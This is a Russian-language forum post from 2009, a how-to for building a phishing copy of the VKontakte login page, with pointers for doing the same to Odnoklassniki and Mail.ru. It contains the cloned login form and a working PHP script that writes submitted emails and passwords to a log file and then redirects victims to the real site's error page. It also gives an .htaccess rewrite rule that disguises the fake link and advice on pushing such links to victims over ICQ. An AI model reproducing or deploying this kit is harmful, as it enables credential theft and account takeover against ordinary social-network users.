| AdMiN | Дата: Пятница, 03.04.2009, 13:40 | Сообщение # 2 |
 Я есть!
Группа: Администраторы
Сообщений: 638
Статус:  | Пример создания фейка
И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index(или login.htm- в зависимости от страницы)  Далее вводим туда нереальные данные и попадаем на страницу, на которой написано Quote Такой почтовый адрес не зарегистрирован, либо пароль неверный. Сохраняем ее точно так же, только вместо index пишем bad. Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищем что-то связанное с эрором контакта... На вторйо страницы мы найдем VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка Все, все что нам надо для фейка от ресурса, у нас уже есть. [CoDiNg] Code <form method="post" name="login" id="login" action="login.php"> <input type="hidden" name="success_url" id="success_url" value=""> <input type="hidden" name="fail_url" id="fail_url" value=""> <input type="hidden" name="try_to_login" id="try_to_login" value="1"> <table align="center" cellpadding=0 cellspacing=7 border=0 width="40%"> <tr> <td width="100px"> <span class="grey">Email:</span> </td> <td> <input class="inputText" type="text" name="email" value="" id="email" size="25" /> <td> </tr> <tr> <td> <span class="grey">Пароль:</span> </td> <td> <input class="inputText" type="password" name="pass" value="" id="pass" size="25" /> </td> </tr> <tr> <td> </td> <td> <input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small> </td> </tr> <tr> <td> </td> <td> Отсюда запоминаем 3 вещи: 1) 2) 3) Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это Code <input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password"> Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже. Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое: PHP код:
Code <?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){
fputs($f, $_POST['email'].";".$_POST['password']." \n");
header("Location: http://");
} else {
header("Location: http://");
}
flock($f,3);
fclose($f);
?> Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки. И так, теперь возвращаемся к тем 3 строчкам:
1) Код:
тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш. 2) Отсюда нам нужно name="email" и name="pass" Вставляем их в наш скрипт в нужное место PHP код:
[color= rgb(0, 0, 0);]
[/color][color= rgb(255, 128, 0);]/* ############# #by_NoNameZ# ########### */ [/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);]=[/color][color= rgb(0, 0, 187);]fopen[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"log.txt"[/color][color= rgb(0, 119, 0);],[/color][color= rgb(221, 0, 0);]"at"[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]flock[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);],[/color][color= rgb(0, 0, 187);]2[/color][color= rgb(0, 119, 0);]); if([/color][color= rgb(0, 0, 187);]preg_match[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"[/color][color= rgb(0, 119, 0);], [/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'email'[/color][color= rgb(0, 119, 0);]])&& !empty([/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'pass'[/color][color= rgb(0, 119, 0);]])){ [/color][color= rgb(0, 0, 187);]fputs[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);], [/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'email'[/color][color= rgb(0, 119, 0);]].[/color][color= rgb(221, 0, 0);]";"[/color][color= rgb(0, 119, 0);].[/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'pass'[/color][color= rgb(0, 119, 0);]].[/color][color= rgb(221, 0, 0);]" \n"[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]header[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"Location: http://"[/color][color= rgb(0, 119, 0);]); } else { [/color][color= rgb(0, 0, 187);]header[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"Location: http://"[/color][color= rgb(0, 119, 0);]); } [/color][color= rgb(0, 0, 187);]flock[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);],[/color][color= rgb(0, 0, 187);]3[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]fclose[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]?>[/color]
Кто не заметил, это $_POST['email'] и $_POST['pass'] Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm. Выглядит это так: PHP код:
[color= rgb(0, 0, 0);]
[/color][color= rgb(255, 128, 0);]/* ############# #by_NoNameZ# ########### */ [/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);]=[/color][color= rgb(0, 0, 187);]fopen[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"log.txt"[/color][color= rgb(0, 119, 0);],[/color][color= rgb(221, 0, 0);]"at"[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]flock[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);],[/color][color= rgb(0, 0, 187);]2[/color][color= rgb(0, 119, 0);]); if([/color][color= rgb(0, 0, 187);]preg_match[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"[/color][color= rgb(0, 119, 0);], [/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'email'[/color][color= rgb(0, 119, 0);]])&& !empty([/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'pass'[/color][color= rgb(0, 119, 0);]])){ [/color][color= rgb(0, 0, 187);]fputs[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);], [/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'email'[/color][color= rgb(0, 119, 0);]].[/color][color= rgb(221, 0, 0);]";"[/color][color= rgb(0, 119, 0);].[/color][color= rgb(0, 0, 187);]$_POST[/color][color= rgb(0, 119, 0);][[/color][color= rgb(221, 0, 0);]'pass'[/color][color= rgb(0, 119, 0);]].[/color][color= rgb(221, 0, 0);]" \n"[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]header[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"Location: http://vkontakte.ru/blank.php?code=10 "[/color][color= rgb(0, 119, 0);]); } else { [/color][color= rgb(0, 0, 187);]header[/color][color= rgb(0, 119, 0);]([/color][color= rgb(221, 0, 0);]"Location: bad.htm"[/color][color= rgb(0, 119, 0);]); } [/color][color= rgb(0, 0, 187);]flock[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);],[/color][color= rgb(0, 0, 187);]3[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]fclose[/color][color= rgb(0, 119, 0);]([/color][color= rgb(0, 0, 187);]$f[/color][color= rgb(0, 119, 0);]); [/color][color= rgb(0, 0, 187);]?>[/color]
Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777. 3) небольшой апдейт... Этот апдейт подойдет очень дл СИ,в корне на фтп создаем фаил .htaccess со следующим содержанием: Код: RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} !index\.htm
RewriteRule (.*) index.htm? [QSA]
ВНИМАНИЕ!!! !index\.htm-на этот фаил ссылаеться редирект, если же у вас фейк допустим login.html. то соответственно вам нужно переиминовать индекс в логин. Такс, данный фаил нам дает ссылку более качественно газлива, а именно: вашфейк.ру/любой текст, тобишь зная ссылку структуру согдаваемого фейка, к примеру контакта, мы можем сделать так: Цитата:
вашфейк.ру/photos.php?act=show&id=15884695_588954334&uid=359648756&self=6 |
и впарить это по аське)))согласитесь. менее заметен теперь фейк)) Вот и все [THe eND] Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error ) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм , а в фейке указываете эту тему для редиректа.
На первый взгляд все сложно, но ето не так!!! Удачи.
|
| |
| |
Вход
Регистрация
Пустой блок
Последние темы
